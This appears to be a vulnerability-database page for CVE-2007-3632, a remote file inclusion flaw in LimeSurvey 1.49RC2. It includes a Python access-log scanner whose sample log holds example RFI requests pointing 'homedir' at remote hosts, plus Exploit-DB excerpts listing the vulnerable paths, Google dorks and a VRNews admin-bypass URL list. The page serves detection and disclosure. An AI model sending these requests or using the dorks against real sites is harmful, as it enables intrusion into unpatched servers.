CVE-2007-3632
published 2007-07-10
Priority P353 · medium 6.8 (CVSS 2.0) · AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit available · EPSS 61.51% (99.1th percentile)
Multiple PHP remote file inclusion vulnerabilities in LimeSurvey (aka PHPSurveyor) 1.49RC2 allow remote attackers to execute arbitrary PHP code via a URL in the homedir parameter to (1) OLE/PPS/File.php, (2) OLE/PPS/Root.php, (3) Spreadsheet/Excel/Writer.php, or (4) OLE/PPS.php in admin/classes/pear/; or (5) Worksheet.php, (6) Parser.php, (7) Workbook.php, (8) Format.php, or (9) BIFFwriter.php in admin/classes/pear/Spreadsheet/Excel/Writer/.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| limesurvey | limesurvey | — | — |
Detection & IOCs (extracted from sources)
- Detect RFI exploitation attempts by monitoring HTTP requests to the vulnerable PHP files for a URL-like value in the 'homedir' GET parameter
- Use the Google dork from the Exploit-DB entry to identify exposed LimeSurvey 1.49RC2 instances that may be targeted
- All nine vulnerable files share the same attack vector: the 'homedir' parameter is used for remote file inclusion across admin/classes/pear/ subdirectories
- Only LimeSurvey (PHPSurveyor) 1.49RC2 is named in this CVE; other versions are not confirmed affected
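The first item above is a log-review task. The following script is an added example, not code from the page's sources or from the LimeSurvey project: it applies that check to Apache/nginx combined-format access logs. The nine file paths are the ones in the CVE description; the sample log lines, the IP addresses (documentation ranges) and the rule that any scheme:// value (including PHP stream wrappers such as php://) counts as remote are this example's own assumptions.

```python
"""Flag access-log requests that look like CVE-2007-3632 RFI attempts.

Looks for requests to any of the nine LimeSurvey 1.49RC2 files under
admin/classes/pear/ whose 'homedir' query parameter carries a URL rather
than a local directory. The sample log below is constructed for this
example; the IP addresses are documentation ranges.
"""
import re
from urllib.parse import parse_qs, urlsplit

# The nine files named in the CVE description, relative to the LimeSurvey root.
VULNERABLE_PATHS = (
    "admin/classes/pear/OLE/PPS/File.php",
    "admin/classes/pear/OLE/PPS/Root.php",
    "admin/classes/pear/Spreadsheet/Excel/Writer.php",
    "admin/classes/pear/OLE/PPS.php",
    "admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php",
    "admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php",
    "admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php",
    "admin/classes/pear/Spreadsheet/Excel/Writer/Format.php",
    "admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php",
)

# Assumption for this example: a homedir value is "remote" when it starts with
# scheme:// (http, https, ftp, but also PHP stream wrappers such as php:// or
# data://) or with a bare //. A filesystem path like /var/www/limesurvey does not match.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.IGNORECASE)

# Combined log format: client, ident, user, [timestamp], "METHOD target proto", status, ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def analyse_request(target):
    """Return (vulnerable_file, homedir_value) for an RFI-looking request, else None.

    target is the request target as logged, e.g. /limesurvey/admin/...php?homedir=...
    """
    parts = urlsplit(target)
    path = parts.path.lower()
    hit = next((p for p in VULNERABLE_PATHS if path.endswith("/" + p.lower())), None)
    if hit is None:
        return None
    # parse_qs percent-decodes, so http%3A%2F%2F... is caught as well as http://...
    for value in parse_qs(parts.query, keep_blank_values=True).get("homedir", []):
        if REMOTE_VALUE.search(value):
            return hit, value
    return None


def scan_log(lines):
    """Return one dict per suspicious request: ip, time, method, status, file, homedir."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m is None:
            continue  # not a combined-format line; skip rather than guess
        found = analyse_request(m["target"])
        if found is None:
            continue
        hits.append({
            "ip": m["ip"], "time": m["ts"], "method": m["method"],
            "status": m["status"], "file": found[0], "homedir": found[1],
        })
    return hits


# Constructed sample: two http RFI attempts (one percent-encoded), a normal
# admin request, a local homedir value, and an ftp attempt sent with POST.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jul/2007:12:01:44 +0000] "GET /limesurvey/admin/classes/pear/OLE/PPS.php?homedir=http://198.51.100.9/s.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.7 - - [10/Jul/2007:12:01:45 +0000] "GET /limesurvey/admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=http%3A%2F%2F198.51.100.9%2Fs.txt%3F HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.0.2.10 - - [10/Jul/2007:12:02:10 +0000] "GET /limesurvey/admin/admin.php?sid=1 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
192.0.2.10 - - [10/Jul/2007:12:02:11 +0000] "GET /limesurvey/admin/classes/pear/OLE/PPS.php?homedir=/var/www/limesurvey HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.22 - - [10/Jul/2007:12:03:00 +0000] "POST /limesurvey/admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=ftp://198.51.100.22/x HTTP/1.0" 500 0 "-" "curl/7.16.0"
"""


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(f'{hit["time"]} {hit["ip"]} {hit["method"]} {hit["file"]} '
              f'homedir={hit["homedir"]!r} status={hit["status"]}')
```

Run against the constructed sample, it reports the two http requests and the ftp one and ignores the request whose homedir is a local path. Two caveats for real use: an access log only records the query string, so a 'homedir' value arriving in a POST body or cookie would not appear here, and the files under admin/classes/pear/ are library classes that the application includes server-side, so any direct request to them, remote homedir or not, is worth a look.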
No detection rules found.
Exploit-DB: LimeSurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion (exploitdb · 2007-07-06 · CVE-2007-3632)
---
## Owner : Pr0T3cT10n
## Email : [email protected]
## Homepage : www.kamikaz-team.com
## Script site : www.limesurvey.org
## Script name : LimeSurvey (PHPSurveyor)
## Version : 1.49RC2
## Type : RFI(Remote File Include)
## Source : http://sourceforge.net/project/showfiles.php?group_id=74605
## D0rk : "You have not provided a survey identification number"
## Bug :
## Files :
## /admin/classes/pear/OLE/PPS/File.php
## /admin/classes/pear/OLE/PPS/Root.php
## /admin/classes/pear/Spreadsheet/Excel/Writer.php
## /admin/classes/pear/OLE/PPS.php
## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php
## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php
## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php
## /adm
Exploit-DB: VRNews 1.1.1 - 'admin.php' Remote Security Bypass (exploitdb · 2007-07-05 · CVE-2007-3611)
---
VRNews v1.x <= /VRNews/admin.php Permission
Found by: R4M! - [email protected]
Dork: intitle:"vrnews v1"
Script: http://www.toocharger.com/fiches/scripts/vrnews/3632.htm
Example:
1. /VRNews/admin.php?act=edit
2. /VRNews/admin.php?act=add
3. /VRNews/admin.php?act=config
4. /VRNews/admin.php?act=del
# milw0rm.com [2007-07-05]
No writeups or analysis indexed.
References
- http://osvdb.org/45791
- http://osvdb.org/45792
- http://osvdb.org/45793
- http://osvdb.org/45794
- http://osvdb.org/45795
- http://osvdb.org/45796
- http://osvdb.org/45797
- http://osvdb.org/45798
- http://osvdb.org/45799
- http://www.vupen.com/english/advisories/2007/2459
- https://exchange.xforce.ibmcloud.com/vulnerabilities/35284
- https://www.exploit-db.com/exploits/4156